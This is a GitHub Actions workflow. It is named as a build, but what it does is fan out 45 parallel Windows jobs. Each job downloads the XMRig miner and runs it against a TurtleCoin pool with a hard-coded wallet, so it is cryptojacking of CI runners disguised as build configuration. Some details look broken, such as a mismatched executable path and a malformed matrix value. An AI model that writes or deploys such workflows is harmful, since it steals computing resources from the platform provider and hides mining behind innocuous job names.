name: Ex_code-unmineable
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: Ex-code
    runs-on: windows-latest
    strategy:
      max-parallel: 10
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.11.1/xmrig-6.11.1-msvc-win64.zip -OutFile xmrig-6.11.1-msvc-win64.zip
    - name: Extract
      run: Expand-Archive xmrig-6.11.1-msvc-win64.zip
    - name: RUNNING
      run: .\xmrig-6.11.1-msvc-win64\xmrig-6.11.11\xmrig.exe --donate-level 1 -o sg.turtlecoin.herominers.com:1160 -u TRTLuweEwEqPstNHhkvxX6UPy4Nw9WAN8gFmeyDHE1Mr54WVPgwUq1L9DqHKCjmcKNHvoNfrh7w7VHVBj1efakotfkt2jeroLmy+99f2d9db14e96087133f0d4a756365d5d5754dbbf06e8eff54ef08991a4daf13 -p kontol -a argon2/chukwav2 -k --randomx-4gb-hugepages
    - name: DONE
      run: exit
